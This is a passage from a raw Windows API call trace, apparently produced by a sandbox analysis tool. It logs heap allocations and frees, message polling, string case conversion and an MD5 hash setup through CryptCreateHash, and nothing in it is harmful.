wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.195] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.199] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.199] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.199] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.199] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.199] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.199] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.199] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.199] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.199] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.199] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.200] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.200] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.200] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0212.200] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0212.200] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.200] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.200] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.200] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.200] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.200] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.200] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.200] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.200] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.200] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.200] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab440, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0212.200] CryptCreateHash (in: hProv=0xa7c770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0212.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38667f8 [0212.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0212.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0212.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0212.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0212.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0212.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0212.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0212.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0212.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0212.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865d30 [0212.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38667f8 | out: hHeap=0x2af0000) returned 1 [0212.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0212.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0212.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0212.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0212.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0212.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0212.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0212.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0212.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0212.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0212.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0212.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0212.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0212.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3) returned 0x2a71d78 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0212.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0212.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0212.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0212.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0212.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.206] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69af0 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0212.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0212.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0212.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3) returned 0x2a71ce8 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f80 [0212.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69a60 [0212.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0212.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69af0 | out: 